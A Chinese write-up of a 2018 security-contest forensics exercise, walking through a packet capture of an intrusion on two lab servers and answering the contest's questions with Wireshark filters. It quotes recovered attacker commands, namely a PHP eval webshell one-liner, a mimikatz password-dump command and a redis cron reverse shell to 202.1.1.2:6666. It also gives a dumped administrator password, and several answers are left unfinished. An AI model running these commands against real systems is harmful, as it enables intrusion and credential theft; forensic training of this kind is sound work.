链接: https://pan.baidu.com/s/145V_xyiMNOIE5bFbCTtNNg 密码: v6wu

1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列)
2.两台服务器的主机名分别是什么
3.黑客使用了什么工具对服务器1进行的攻击(小写)
4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)
7.服务器1安装的修补程序名称
8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)
9.黑客使用什么命令或文件进行的内网扫描
10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)
11.黑客执行的什么命令将administrator的密码保存到文件中
12.服务器1的系统管理员administrator的密码是什么
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)
14.服务器1的mysql的root用户的密码是什么
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径
16.服务器2的web网站后台账号密码(格式:账号/密码)
17.黑客在redis未授权访问中反弹shell的ip和端口是多少
18.黑客拿到root权限后执行的第二条命令是什么
19.服务器2的root用户密码是什么
20.黑客向服务器2写入webshell的命令
21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)

1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列)

数据包1

http

攻击者ip 202.1.1.2 服务器1ip 192.168.1.74  服务器2ip 见下面分析

2.两台服务器的主机名分别是什么

找phpinfo

http contains "phpinfo"

数据包二中找到

将返回的phpinfo源码复制到新建的html中,保存后打开

可以看到服务器1的主机名 TEST-7E28AF8836

在后续的数据包中继续过滤

 ip.addr == 192.168.2.66 && http contains "phpinfo"

3.黑客使用了什么工具对服务器1进行的攻击(小写)

sqlmap

4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)

ip.addr == 192.168.1.74 && ip.addr ==202.1.1.2 &&http 

发现数据包1中,一直在跑sqlmap

数据包2中,跑完sqlmap后开始扫目录

扫到后台后,开始登陆,看到下面返回admin后台相关的内容,说明此处提交的user和pwd正确

5.黑客向服务器1写入webshell的具体命令是什么(url解码后)

数据包二的最下面发现多了个,abc.php,应该不是网站本身的文件,看到上面通过php命令执行写的shell

http://202.1.1.1/tmpbjhbf.php?cmd=echo ^<?php^ eval($_POST[ge]);?^>>abc.php

6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)

查看abc.php的请求包都是b64,所以abc.php菜刀一句话呀

总是b64decode太麻烦,不如看对应的返回包,大致能猜出菜刀做了什么操作

接着数据包3

菜刀上传了scan.php扫内网

tunel.nosoket.php作为内网代理

mimi下的mimikatz.exe用来dump服务器1的密码

可以看到服务器1开放的端口有80 135 445 1025 3306 3389 139

TCP注册端口(小于1024)

所以服务器1允许外连的TCP注册端口为80 135 139 445

这时候需要Google搞明白这几个端口是干啥用的。。

紧接着菜刀执行了systeminfo

返回

服务器1为Windows,修补程序Q147222

scan.php 扫描内网 192.168.1.1~192.168.3.255  扫描端口 21,80,8080,1433,3306,6379

追踪tcp流查看返回

<br/>Scanning IP 192.168.1.1<br/>
Port: 80 is open<br/>
<br/>Scanning IP 192.168.1.8<br/>
Port: 80 is open<br/>
Port: 3306 is open<br/>
<br/>Scanning IP 192.168.1.33<br/>
17Port: 3306 is open<br/>
<br/>Scanning IP 192.168.1.74<br/>

Port: 80 is open<br/>

Port: 3306 is open<br/>
<br/>Scanning IP 192.168.1.159<br/>

Port: 80 is open<br/>

Port: 8080 is open<br/>

Port: 3306 is open<br/><br/>Scanning IP 192.168.1.169<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>21
<br/>Scanning IP 192.168.2.1<br/>
15
Port: 80 is open<br/>
21<br/>Scanning IP 192.168.2.20<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
2222
<br/>Scanning IP 192.168.2.66<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
17
Port: 6379 is open<br/>
2222
<br/>Scanning IP 192.168.2.88<br/>
15
Port: 21 is open<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
2221
<br/>Scanning IP 192.168.3.1<br/>
15
Port: 80 is open<br/><br/>Scanning IP 192.168.3.6<br/>
15
Port: 80 is open<br/>
17
Port: 3306 is open<br/>
21

7.服务器1安装的修补程序名称    从systeminfo返回可看出

8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)    phpinfo 可找到

9.黑客使用什么命令或文件进行的内网扫描     scan.php

10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)

前面只扫了192.168.1.1-192.168.3.255 说明服务器2就从这个网段之间,并且有端口开放的那几个之间选择。。

数据包四

所以服务器2 ip 192.168.2.66

从上面scan.php返回结果可知,扫描结果中服务器2开放了80 3306 6379

11.黑客执行的什么命令将administrator的密码保存到文件中

返回数据包3,黑客用mimikatz dump下服务器已的密码

说明将administrator的密码保存到文件中 的操作就在这附近

cd /d "C:\WWW\my\mimi\"&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> log.txt&echo [S]&cd&echo [E]

12.服务器1的系统管理员administrator的密码是什么

从上面mimiditz的log可知administrator的密码为Simplexue123

13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx) 192.168.1.1~192.168.3.255

14.服务器1的mysql的root用户的密码是什么  

mysql相关信息一般都存在config配置文件中

可以http过滤后查看113060到472649之间的config请求包及respone,或者直接过滤root

http contains "root"

15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径

数据包5

tcp and !(tcp.port == 80) and !(tcp.port == 443) and !(tcp.stream eq 98) and ip.addr == 202.1.1.2

追踪tcp流

可看到绝对路径/var/www/html/

16.服务器2的web网站后台账号密码(格式:账号/密码)

http contains "admin" ||http contains "pass"

服务器2开启的6379端口应该是redis的,貌似黑客通过redis未授权访问拿到shell然后进行后续操作的。

那么应该过滤tcp.port == 6379

数据包4内没有相关内容

数据包5

* * * * * bash -i >& /dev/tcp/202.1.1.2/6666 0>&1

so黑客在redis未授权访问中反弹shell的ip和端口是202.1.1.2和6666

18.黑客拿到权限后执行的第二条命令是什么

cd /var/www/html

19.服务器2的root用户密码是什么

20.黑客向服务器2写入webshell的命令

21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)

无偿arp包,可以发现isgratuitous必须为true。利用规则arp.isgratuitous == true可以找到数据包。。。

不过,我还是没找到。。。

转载于:https://www.cnblogs.com/1go0/p/10065813.html

2018.6.1信息安全铁人三项赛数据赛writeup相关推荐

  1. 2018.5.5信息安全铁人三项赛数据赛复现

    前言: 最近的学习效率不是很高,但无论在家还是学校都要学会自律,而且马上就铁人三项比赛了,通过复现一些之前的赛题进行学习. 0x01:涉及的一些协议 TCP(传送控制协议) 作用:是一种面向连接.可靠 ...

  2. 2018.5.18信息安全铁人三项赛数据赛复现

    前言: 流量分析不同与之前的CTF题,感觉没有那么多脑洞,考察的就是对协议的理解程度,所以还是要多做做,多学习! 题目描述 1.黑客的IP是多少2.服务器1.99的web服务器使用的CMS及其版本号( ...

  3. 信息安全 数据赛 铁人三项_2018.5.18信息安全铁人三项赛数据赛题解

    本文原创作者:一叶飘零 目录 题目描述 第一个数据包 第三个数据包 第四个数据包 路由器hacking 后记 题目描述 1.黑客的IP是多少 2.服务器1.99的web服务器使用的CMS及其版本号(请 ...

  4. 信息安全 数据赛 铁人三项_信息安全铁人三项赛-赛事章程-信息安全铁人三项赛...

    赛事章程 竞赛总则 为贯彻<国务院关于大力推进大众创业万众创新若干政策措施的意见><国务院办公厅关于深化高等学校创新创业教育改革的实施意见>,落实中央网信办.国家发改委.教育部 ...

  5. 信息安全 数据赛 铁人三项_信息安全铁人三项赛线上资格赛完美收官

    ​​ 4月8日,由中国信息安全测评中心指导,中国信息产业商会信息安全产业分会主办.教育部高等学校信息安全专业教学指导委员会协办,中国信息安全产业商会信息安全产业分会人才建设专业委员会和北京西普阳光教育 ...

  6. ML之LGBMRegressor(Competition):2018年全国大学生计算机技能应用大赛《住房月租金预测大数据赛》——设计思路以及核心代码—191017再次更新

    ML之LGBMRegressor(Competition):2018年全国大学生计算机技能应用大赛<住房月租金预测大数据赛>--设计思路以及核心代码-191017再次更新 目录 竞赛相关信 ...

  7. [完整]首届盘古石杯电子数据取证大赛晋级赛Writeup

    首届盘古石电子数据取证大赛晋级赛Writeup 致谢 湖南警察学院-雷波(https://mp.weixin.qq.com/s/KyeHWgnfRdR0yUZm9PUYhQ) 浙江警察学院-Zodi4 ...

  8. 信息安全 数据赛 铁人三项_2018信息安全铁人三项数据赛题解

    前言 由于自己赛区的铁三比赛在最后一场,于是利用闲暇时间做了一下别的赛区的题目,这里给出5月5号比赛的数据赛做题记录 题目分享: 链接: https://pan.baidu.com/s/1b6bkW- ...

  9. 第15届(2018)全国大学生信息安全与对抗技术竞赛(ISCC2018)通知

    第15届(2018)全国大学生信息安全与对抗技术竞赛(ISCC2018)通知 1 竞赛简介 信息安全已涉及到国家政治.经济.文化.社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越 ...

最新文章

  1. WindowsPhone7真机部署和调试程序
  2. hadoop centos 安装
  3. python pywinauto 单击鼠标_Python 基础(十):模块与包
  4. Description Resource Path Location Type Path must include project and resource name: /
  5. c语言case的应用,switch、case的使用
  6. Material Design入门(二)
  7. 双飞翼布局内容不换行_web前端入门到实战:圣杯布局和双飞翼布局
  8. 关于vue3.0中的this.$router.replace({ path: '/'})刷新无效果问题
  9. 【Java数据结构与算法】第五章 递归、迷宫回溯和八皇后问题
  10. Android基础篇1:Activity
  11. data1 op data2 c语言,编写一个简单计算器程序,输入格式为:data1 op data2。其中data1和data2是参加...
  12. 立体栅格地图_高精地图之3D栅格地图的应用
  13. 网页分享至Facebook,Twitter,LinkedIn,WhatsApp,邮箱总结
  14. 石英晶振的电路组成与设计
  15. 读Google MapReduce后有感
  16. 划分vlan实验心得体会_计算机网络实验心得体会_计算机网络实验工作感想
  17. Error:A fatal exception has occurred.Program will exit
  18. 史上最全私募基金的投资模式和策略总结
  19. 电视机当计算机屏幕,电视机能当显示器吗?电视机是更大更便宜 但真的做不了显示器...
  20. 离散数学(图)--思维导图

热门文章

  1. SAP CRM Opportunity订单的文档流Document Flow的一些变体variant
  2. 通过一个实际例子理解Kubernetes里pod的自动scale - 水平自动伸缩
  3. php dvld.active 1,PHP的字符串
  4. 宏程序编程软件手机版_分享 | 手机上可以用来学习编程的软件,主要的都在这里...
  5. v8声卡调音软件_sE VOXTOON AF2评测:解决复杂跳线需求的声卡
  6. python 禁用网卡_如何编程实现启用禁用网卡
  7. eclipse没有dynamic web project_Microsoft Teams迎来Project与Roadmap功能集成
  8. combotree 可以异步加载吗_Unity AssetBundle 资源打包,加载,本地缓存方式,安卓,PC本地加载路径问题...
  9. 前端遮罩层实现_css遮罩层怎么做?
  10. Oracle asm aix盘,AIX/HP UX/LINUX上ORACLE ASM添加磁盘